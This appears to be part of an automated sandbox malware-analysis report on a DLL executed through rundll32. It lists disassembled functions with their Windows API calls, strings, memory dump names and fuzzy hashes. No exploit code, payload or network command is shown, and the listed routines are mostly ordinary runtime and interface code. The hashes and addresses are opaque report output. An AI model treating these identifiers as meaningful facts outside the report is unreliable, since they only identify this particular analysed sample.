CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
LoadBitmapA.USER32 ref: 10020A8D

Strings

, xrefs: 100209F3

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50

Uniqueness

Uniqueness Score: -1.00%

Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
GetSystemMetrics.USER32 ref: 10025168
GetSystemMetrics.USER32 ref: 1002516F

Strings

DISPLAY, xrefs: 1002518C
B, xrefs: 1002512F

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 10022E4B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Edit, xrefs: 10022E9F

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
Instruction ID: d6f5fafa54f95e57ce7326ac47ec6df47115e019fe7e1f47642f1b857b3d0bbf
Opcode Fuzzy Hash: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
Instruction Fuzzy Hash: 4611A131200205BBEE20DAA1AC05F5EB6ECFF46791F930929F956D64B1CF61DC80E564

Uniqueness

Uniqueness Score: -1.00%

Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1003748E

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003749F
__getptd.LIBCMT ref: 100374AD

Strings

MOC, xrefs: 10037480
csm, xrefs: 10037487

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692

Uniqueness

Uniqueness Score: -1.00%

Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
_memset.LIBCMT ref: 1002A78B
GetWindowTextA.USER32 ref: 1002A7A5
lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
SetWindowTextA.USER32(?,?), ref: 1002A7C3

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4

Uniqueness

Uniqueness Score: -1.00%

Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10033049

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__amsg_exit.LIBCMT ref: 10033069
__lock.LIBCMT ref: 10033079
InterlockedDecrement.KERNEL32(?), ref: 10033096
InterlockedIncrement.KERNEL32(04741648), ref: 100330C1

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
FreeLibrary.KERNEL32(?), ref: 100286DC

Strings

hhctrl.ocx, xrefs: 100286B0
HtmlHelpA, xrefs: 100286C6

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59

Uniqueness

Uniqueness Score: -1.00%

Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF

Strings

KERNEL32, xrefs: 1003B6EA
IsProcessorFeaturePresent, xrefs: 1003B6F9

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345

Uniqueness

Uniqueness Score: -1.00%

Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100031BF
SetLastError.KERNEL32(0000007F), ref: 100031EB

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1003EEC4, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
__isleadbyte_l.LIBCMT ref: 1003EF2C
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
Instruction ID: 26013823be584ed4b010159d5efc2338de830fada2216c2f4930337caeab7791
Opcode Fuzzy Hash: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
Instruction Fuzzy Hash: 52318931A002D6EFDB12DF64C880AAA7BE5EF41352F1286A9F4648F1E1D770AD40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002B5F7
__msize.LIBCMT ref: 1002B61A
_malloc.LIBCMT ref: 1002B632
_malloc.LIBCMT ref: 1002B647

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 100033CE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 100033DA
HeapFree.KERNEL32(00000000), ref: 100033E1

Strings

Oxt, xrefs: 100033DA

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FreeHeap$ProcessVirtual
String ID: Oxt
API String ID: 190046822-1245641732
Opcode ID: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction ID: 2d2bd09531cc21cd0688133637c85df5768d7ec480326e7220fdcfa052c0fbce
Opcode Fuzzy Hash: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction Fuzzy Hash: 2F317474A00208EFDB05DF94C685B9EB7B6FB48344F24C298E9055B395CB75AF41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10023B39
__CxxThrowException@8.LIBCMT ref: 10023B55
__CxxThrowException@8.LIBCMT ref: 10023B71
__cftof.LIBCMT ref: 10023B88

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$__cftof
String ID:
API String ID: 887240167-0
Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
LoadResource.KERNEL32(?,00000000), ref: 100231B0
LockResource.KERNEL32(00000000), ref: 100231C2
FreeResource.KERNEL32(00000000), ref: 10023210

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10024E13, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10024E1A

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

__CxxThrowException@8.LIBCMT ref: 10024E50
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B

Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88

LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
String ID:
API String ID: 1808948168-0
Opcode ID: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
Instruction ID: b82dd79aa3f9a22217a6a5774d94273f1735641f27abfa85c715a235195ff0cc
Opcode Fuzzy Hash: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
Instruction Fuzzy Hash: 2711C6B1604249BFEF01DFA4DC81DAE3BA9FF08350F628529F619CB1A1DB319950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100217B5

Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4

__strdup.LIBCMT ref: 100217D7
GetCurrentThread.KERNEL32 ref: 10021804
GetCurrentThreadId.KERNEL32 ref: 1002180D

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44

Uniqueness

Uniqueness Score: -1.00%

Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
swprintf.LIBCMT ref: 1002AC34
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
